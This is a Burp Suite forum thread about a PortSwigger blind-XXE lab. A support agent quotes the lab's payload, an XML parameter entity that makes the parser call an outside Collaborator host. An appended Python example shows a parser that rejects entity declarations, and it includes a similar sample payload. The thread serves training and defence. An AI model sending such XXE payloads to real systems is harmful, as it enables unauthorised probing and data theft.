Burp Suite User Forum

Problem with this lab: Lab: Blind XXE with out-of-band interaction via XML parameter entities

Deepak | Last updated: Sep 12, 2021 02:02PM UTC

I can't solve the lab even after using the solution; it says entities not allowed.

Deepak | Last updated: Sep 12, 2021 02:07PM UTC

https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities

Uthman, PortSwigger Agent | Last updated: Sep 13, 2021 08:48AM UTC

Hi Deepak,

The lab does appear to be functioning as expected. I have just completed it successfully. Can you try waiting ~15 minutes for it to reset before attempting this again?

Are you using Burp Suite Professional?

Does your payload look something like the below?

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://<collaborator-subdomain>.burpcollaborator.net"> %xxe; ]>
    <stockCheck>
    <productId>2</productId>
    <storeId>1</storeId>
    </stockCheck>
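
From the defender's side, a parser-level guard against the kind of payload quoted above: this is an added example, not PortSwigger's code or the lab's implementation. It uses Python's `xml.parsers.expat` to refuse any DOCTYPE entity declaration before the request is processed; the function names, error text and sample bodies (with a placeholder host) are constructed for illustration.

```python
import xml.parsers.expat as expat


class EntityDeclarationRejected(ValueError):
    """The request body declared an entity in its DOCTYPE."""


def parse_stock_check(body: bytes) -> dict:
    """Parse a stockCheck body; refuse any general or parameter entity declaration."""
    parser = expat.ParserCreate()
    # Never process external parameter entities or an external DTD subset.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    fields, path, text = {}, [], []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Fires for every <!ENTITY ...> in the DTD; abort before any use of it.
        kind = "parameter" if is_param else "general"
        scope = "external" if system_id else "internal"
        raise EntityDeclarationRejected(f"{scope} {kind} entity {name!r} not allowed")

    def on_start(tag, attrs):
        path.append(tag)
        text.clear()

    def on_end(tag):
        if path == ["stockCheck", tag]:      # direct child of the root element
            fields[tag] = "".join(text).strip()
        path.pop()

    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = text.append
    parser.Parse(body, True)                 # handler exceptions propagate from here
    return fields


def rejection_reason(body: bytes):
    """Return the rejection message for a body, or None if it parses cleanly."""
    try:
        parse_stock_check(body)
    except EntityDeclarationRejected as exc:
        return str(exc)
    return None


# Constructed sample bodies; placeholder.invalid is not a real Collaborator host.
CLEAN = (b'<?xml version="1.0" encoding="UTF-8"?>'
         b'<stockCheck><productId>2</productId><storeId>1</storeId></stockCheck>')
WITH_PARAM_ENTITY = CLEAN.replace(b'?>', b'?><!DOCTYPE stockCheck [<!ENTITY % xxe '
                                  b'SYSTEM "http://placeholder.invalid/"> %xxe; ]>', 1)
```

Rejecting at the declaration, rather than at the `%xxe;` reference, means the document is refused even when the entity is declared but never used.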
